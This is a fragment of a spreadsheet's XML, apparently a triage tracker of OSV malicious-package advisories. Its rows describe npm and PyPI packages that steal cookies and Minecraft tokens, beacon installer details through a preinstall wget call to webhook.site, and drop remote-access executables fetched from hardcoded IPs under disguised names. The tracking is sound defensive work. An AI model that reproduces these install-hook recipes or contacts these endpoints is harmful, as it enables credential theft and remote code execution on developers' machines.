      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr"/>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (02c4b3433d9f819c70b6ec69fe7bcc0ae0a7ff48540e11394ea5fb8f3c49049c)
my-skibidi@1.0.2 contains top-level code in its main module that unconditionally POSTs `document.cookie` to the hardcoded remote endpoint https://c-b34596407b6d47d6.dgactf-challs.site/addPost via a `sendPost(...)` call. Any downstream web application that bundles this package will, when loaded in a user's browser, transmit that user's cookies and session data to the external host. The destination is not a first-party service and is not caller-configurable; the exfiltration runs as a side effect of loading the module. The package's declared functionality does not require reading or transmitting cookies, and no consent gate or configuration controls the behavior.
## Source: ghsa-malware (47126398a61b320eb7bbad1b71461843e4609e46f5137d735ea3d15d976c7f46)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22" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17217</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17213</t>
        </is>
      </c>
      <c r="D223" s="5" t="inlineStr"/>
      <c r="E223" s="5" t="inlineStr"/>
      <c r="F223" s="5" t="inlineStr"/>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr">
        <is>
          <t>PyPI:azure-langchain-example</t>
        </is>
      </c>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr"/>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1cffc3a51858b1b7a17ff0edfd2eeae6383e83b4eff5bc078f7b1d4f5ba36ad2)
On `import azure_langchain_example`, the package's __init__.py starts a background daemon thread that issues a GET request to https://litellm.adversarylabx.com/.telemetry with the installer's hostname, resolved IP address, a timestamp, and the package name in the query string, using urllib.request.urlopen with a short timeout and silenced exceptions. The destination host is unrelated to the package's advertised purpose (a minimal LangChain wrapper for Azure OpenAI) and to any Azure or LangChain publisher domain. The behavior fires unconditionally at import without user consent or opt-out and is not mentioned in the README. Package metadata is placeholder (`Your Name &lt;you@example.com&gt;`) and the name resembles the Azure+LangChain ecosystem, consistent with a lookalike used to profile installers who mistype or guess an Azure/LangChain integration package name. An in-source comment labeling the request a harmless canary is author-controlled text that does not change the observed behavior.
## Source: kam193 (59c10650dde5db077b435212025a4cb48ab69daf76022cb932dfec98beea4479)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223" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17213</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17214</t>
        </is>
      </c>
      <c r="D224" s="5" t="inlineStr"/>
      <c r="E224" s="5" t="inlineStr"/>
      <c r="F224" s="5" t="inlineStr"/>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="inlineStr"/>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr">
        <is>
          <t>npm:git-en-boite-logging</t>
        </is>
      </c>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr"/>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f6ebee9f4428d7f14f6f941438064715c8bece34c5fe6bfedf32bbd8cba226c0)
package.json declares a preinstall lifecycle hook that runs `wget` to a hardcoded webhook.site collector URL (https://webhook.site/3fcfa5af-1b4e-4556-9d48-26190d02795f/), passing `$(whoami)`, `$(hostname)`, and `$(pwd)` as query parameters. On `npm install`, npm invokes the preinstall script automatically, so the installer's OS username, host name, and current working directory are transmitted to an anonymous third-party webhook collector without any user action. This is the canonical dependency-confusion / reconnaissance beacon shape: an otherwise-empty package whose only on-install effect is to phone home installer identity to an attacker-chosen endpoint, typically used to confirm ingress into a target's internal build environment before staging a follow-on payload.
</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17214</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17215</t>
        </is>
      </c>
      <c r="D225" s="5" t="inlineStr"/>
      <c r="E225" s="5" t="inlineStr"/>
      <c r="F225" s="5" t="inlineStr"/>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr">
        <is>
          <t>npm, eslint, go, gin</t>
        </is>
      </c>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr">
        <is>
          <t>npm:eslint-plugin-skywagon-web</t>
        </is>
      </c>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr"/>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3c5d134d2e79b24ed65d2998520db05b5cc86b251ae579a6d8cec6d8fe02340f)
eslint-plugin-skywagon-web@100.0.0 ships an index.js that is executed via a preinstall lifecycle script on `npm install`. The script collects installer-side identifiers — os.hostname(), os.userInfo().username, os.homedir(), process.cwd(), dns.getServers(), and the contents of the package's package.json — and POSTs them over HTTPS to the hardcoded external collector eo1blcdjptwydyq.m.pipedream.net. A source comment ("replace burpcollaborator.net with Interactsh or pipedream") shows the file is a dependency-confusion exfiltration template repurposed as a live payload. The implausibly high version number (100.0.0) is consistent with a dependency-confusion lure intended to override an internal package of the same name during resolution.
</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17215</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17223</t>
        </is>
      </c>
      <c r="D226" s="5" t="inlineStr"/>
      <c r="E226" s="5" t="inlineStr"/>
      <c r="F226" s="5" t="inlineStr"/>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr">
        <is>
          <t>npm:chalk-figlet</t>
        </is>
      </c>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr"/>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (66dfb43d5f4ae643e32497447293c12170a21f258a7e7d3d07e8f90f2119e13b)
package.json declares a postinstall script (`node example.js`) that requires index.js at install time. index.js contains a function named `_syncTelemetry` that decodes a hex-obfuscated URL (`Buffer.from('687474703a...','hex')` -&gt; `http://104.234.65.75:700/setup.exe`) and a hex-obfuscated filename (`RuntimeBroker.exe`), downloads the binary over plain HTTP from a bare IP using `axios.get(..., {responseType:'stream'})` piped to `fs.createWriteStream` in `os.tmpdir()`, and executes it via `child_process.exec` with `windowsHide: true`. Execution is gated on `process.env.npm_lifecycle_event` so it fires during `npm install`. The dropped filename impersonates the legitimate Windows system binary RuntimeBroker.exe, and the package presents itself as a chalk+figlet wrapper unrelated to the observed behavior.
</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17223</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17224</t>
        </is>
      </c>
      <c r="D227" s="5" t="inlineStr"/>
      <c r="E227" s="5" t="inlineStr"/>
      <c r="F227" s="5" t="inlineStr"/>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr">
        <is>
          <t>npm:fabric-asset-pipeline</t>
        </is>
      </c>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr"/>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (bb92787d766d5bfa0c384cc04909689215fa0d3e869630422caa8bedd303038a)
fabric-asset-pipeline@1.0.0 declares a postinstall hook that runs index.js on npm install. index.js is heavily obfuscated (obfuscator.io-style rotated string array plus base64+RC4 decoding of identifiers and URLs, with newline/regex anti-formatting hooks) and implements a Minecraft credential stealer: functions stealLauncherAccounts(), stealAltLaunchers(), and readSessionDump() read account credential stores from the official Minecraft launcher (launcher_accounts.json / launcher_profiles.json) as well as Prism/MultiMC, TLauncher, Modrinth, PolyMC, and GDLauncher, plus a session dump from the OS temp directory. Extracted account names, access tokens, and refresh tokens are POSTed via https.request to a hardcoded webhook whose URL is RC4-decoded at runtime. A companion sendInfo() call ships os.hostname(), os.userInfo().username, os.platform()/os.release(), and the recovered Minecraft username to the same endpoint. None of this behavior is part of the package's advertised 'asset loader bridge' purpose, and the obfuscation deliberately conceals both the exfiltration functions and the destination URL.
</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17224</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17225</t>
        </is>
      </c>
      <c r="D228" s="5" t="inlineStr"/>
      <c r="E228" s="5" t="inlineStr"/>
      <c r="F228" s="5" t="inlineStr"/>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr">
        <is>
          <t>npm:fabric-render-bridge</t>
        </is>
      </c>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr"/>
      <c r="S228" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c2715ef0b07fbf0ca24fb8dadec44f2fcfdc273421a49ad2201bf8e40d3e2c01)
package.json declares postinstall="node index.js", so `npm install fabric-render-bridge` automatically executes index.js. index.js reads Minecraft launcher credential stores across multiple launchers (launcher_accounts.json and launcher_profiles.json for the official launcher, PrismLauncher, MultiMC, TLauncher, Modrinth, PolyMC, GDLauncher) plus a session dump from the OS temp directory, extracts accessToken/refreshToken values and account usernames, and POSTs them via https.request to a hardcoded Discord webhook at discord.com/api/webhooks/1554065488726990909/. A separate sendInfo() routine POSTs os.hostname(), os.userInfo().username, os.platform() and os.release() to the same webhook on every install. The package presents itself as a Fabric render bridge but ships no rendering functionality; its sole install-time behavior is credential and host-identity theft.
</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17225</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17226</t>
        </is>
      </c>
      <c r="D229" s="5" t="inlineStr"/>
      <c r="E229" s="5" t="inlineStr"/>
      <c r="F229" s="5" t="inlineStr"/>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="inlineStr"/>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr">
        <is>
          <t>npm:figlet-chalk-render</t>
        </is>
      </c>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr"/>
      <c r="S229" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (992cf49b88be09149971d4ac18fe2a4b61d242186f553cb3283a26970b886d7f)
The package is advertised as a chalk+figlet wrapper but index.js contains a top-level IIFE that runs on require. On Windows hosts, it reconstructs the module names 'https', 'os', 'fs', 'path', and 'child_process' and the method name 'spawn' from char-code arrays, hex escapes, and string concatenation to hide the network and execution chain. It then decodes the hardcoded plain-HTTP URL http://104.234.65.75:700/setup.exe and the filename RuntimeBroker.exe (masquerading as a legitimate Windows binary), downloads the payload into the OS temp directory via https.get piped to createWriteStream, and spawns it detached with windowsHide: true and.unref(). Execution is gated to skip environments where CI, SANDBOX, GITHUB_ACTIONS, or TRAVIS are set, evading sandbox and CI analysis. The obfuscation, bare-IP plain-HTTP delivery, RuntimeBroker.exe masquerade, and CI-evasion gate are inconsistent with the package's stated purpose and match an install/require-time Windows dropper.
</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17226</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17227</t>
        </is>
      </c>
      <c r="D230" s="5" t="inlineStr"/>
      <c r="E230" s="5" t="inlineStr"/>
      <c r="F230" s="5" t="inlineStr"/>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr">
        <is>
          <t>npm:nebula-llm</t>
        </is>
      </c>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr"/>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b33da6aef41209f654f8f76cc56074a7b827599f42f941e3917326da1f4d2566)
The npm package nebula-llm@1.0.0 ships a preinstall lifecycle script (preinstall.cjs) that embeds a ~257KB Windows PE binary as a base64+zlib-compressed string literal. On `npm install` on Windows, the script decompresses the blob, writes it to %LOCALAPPDATA%\Microsoft\Conhost\conhost.exe — impersonating the legitimate Windows Console Host binary — and spawns it detached with stdio ignored and windowsHide:true, then unrefs the child so it survives the install process. The decoded PE contains a.kntrat section and references github.com/syskiel/kntrat-e and IP 65.87.7.132, consistent with a persistent remote-access implant. Installation therefore executes an opaque author-supplied executable on the installer's host with no user interaction and no purpose related to any documented package function.
</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17227</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17228</t>
        </is>
      </c>
      <c r="D231" s="5" t="inlineStr"/>
      <c r="E231" s="5" t="inlineStr"/>
      <c r="F231" s="5" t="inlineStr"/>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr">
        <is>
          <t>npm:nebulaai-sdk</t>
        </is>
      </c>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr"/>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (dc906b81107141fbd85dcabf89fd2f5112c4e4a134045c90d6a35abb4b67d16e)
The package's `preinstall.js` contains a base64+zlib-encoded 257 KB Windows PE executable. On `npm install` on Windows, the script decodes the blob and writes it to `%LOCALAPPDATA%\Microsoft\Conhost\conhost.exe` — a path and filename that impersonates a legitimate Windows console host binary — then spawns it via `child_process.spawn` with `detached: true`, `stdio: 'ignore'`, and `windowsHide: true`, so execution is silent and survives the npm process. The decoded PE contains a section named `.kntrat` and references the external host `65.87.7.132` and the repository `github.com/syskiel/kntrat-e`, indicating remote command-and-control functionality (RAT-shaped naming). The package has no legitimate SDK functionality visible; the preinstall hook exists solely to stage and run the embedded executable. Installing this package on a Windows host results in full arbitrary code execution under the installing user, with a masqueraded persistent binary staged under LOCALAPPDATA and a C2 endpoint reachable at 65.87.7.132.
</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17228</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17229</t>
        </is>
      </c>
      <c r="D232" s="5" t="inlineStr"/>
      <c r="E232" s="5" t="inlineStr"/>
      <c r="F232" s="5" t="inlineStr"/>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr">
        <is>
          <t>npm:simple-date-formatter-new-12</t>
        </is>
      </c>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr"/>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (bd79db99adb8878673dd85db5a29661432808fa8fcc5e3d750b907418df8ae5f)
npm package simple-date-formatter-new-12@1.0.0 declares a postinstall lifecycle script in package.json that runs automatically on `npm install`. The script uses curl to fetch an internal Baidu host (http://bsrc-ssrf.n.baidu-int.com/...), writes the response to /tmp/bsrc.txt, and POSTs the contents to an attacker-controlled interactsh collector at pdxkwzizhzzdpzpgcieqk6d1v7ynqsgfo.oast.fun/bsrc. The package's advertised purpose is a trivial date-formatting wrapper (index.js exports a single formatDate function); the SSRF probe and outbound exfiltration are unrelated to that purpose. The name shape (`simple-date-formatter-new-12`), empty author metadata, and OAST beacon are consistent with a dependency-confusion / typosquat probe designed to detect installation inside a target organization and leak internal network responses reachable from the installer's network position to a third-party collector.
</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17229</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17230</t>
        </is>
      </c>
      <c r="D233" s="5" t="inlineStr"/>
      <c r="E233" s="5" t="inlineStr"/>
      <c r="F233" s="5" t="inlineStr"/>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr">
        <is>
          <t>npm:llm-nebula</t>
        </is>
      </c>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr"/>
      <c r="S233" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0eee293a9973027154eea71635c14e8a4cb2ad8a1e4f80a65399ad874afcb669)
Package presents itself as an LLM SDK (nebula.js exposes a small client stub) but declares `preinstall: node preinstall.cjs` in package.json, and preinstall.cjs is a ~232KB single-line obfuscated blob that runs automatically on `npm install`. The script wraps its body in a `Function(...)` constructor and uses a custom PRNG-based string decoder (TEA/xorshift-style constants 0x9e3779b9 / 0x243f6a88 / 0x6a09e667) over a packed printable-ASCII string plus a hex-int array to reconstruct characters via `String.fromCharCode`, driving a control-flow-flattened switch dispatcher. Node builtins and method names are resolved dynamically at runtime (e.g. `Ooa8zU["Bd5Wj1"]("fs")`) so module ids, filesystem paths, network destinations, and command strings are not visible without executing the decoder. This obfuscation-plus-lifecycle-hook composition is the canonical install-time dropper / RCE shape: the benign-looking library entry serves as a cover story while the hidden preinstall payload runs on any consumer's machine at install time with the user's privileges, capable of arbitrary filesystem, process, and network operations.
</t>
        </is>
      </c>
      <c r="T233" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17230</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17231</t>
        </is>
      </c>
      <c r="D234" s="5" t="inlineStr"/>
      <c r="E234" s="5" t="inlineStr"/>
      <c r="F234" s="5" t="inlineStr"/>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr">
        <is>
          <t>npm:dotenv-native</t>
        </is>
      </c>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr"/>
      <c r="S234" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4369c7fa886fc7d315922759932056664863d71157bcdece943fa53339586f03)
Package `dotenv-native` typosquats the popular `dotenv` family (bundled internal manifest name `node-env-buffer`) and executes an attacker-controlled payload on module load. On require, `dist/index.cjs` and the `dot2env` CLI entry `dist/cli.cjs` invoke a `dispatchAnalytics` routine that opens the bundled `dist/stest.jpg`, scans JPEG segments for an APP1/EXIF (0xFFED) marker, extracts the marker contents as a UTF-8 string, writes a `relay_*.vbs` file to a temp directory, and spawns `wscript.exe` detached with `windowsHide:true` to launch `powershell.exe -EncodedCommand &lt;EXIF-derived base64&gt;`. The strings `powershell`, `shell`, `.exe`, `wscript.exe`, and `-EncodedCommand` are split into arrays and joined at runtime to evade static matching. A second artifact `dist/decode.js` is an obfuscator.io-style bundle that base64-decodes an inline blob, RC4-decrypts it with a hardcoded key, base64-decodes again, and passes the result to `new Function(require, module, __filename, __dirname,...)` — a decode-and-eval RCE primitive shipped alongside the main dropper. Both the library entry and the CLI entry carry the loader, so consumption as a dependency or invocation of the `dot2env` bin runs the payload on Windows hosts.
</t>
        </is>
      </c>
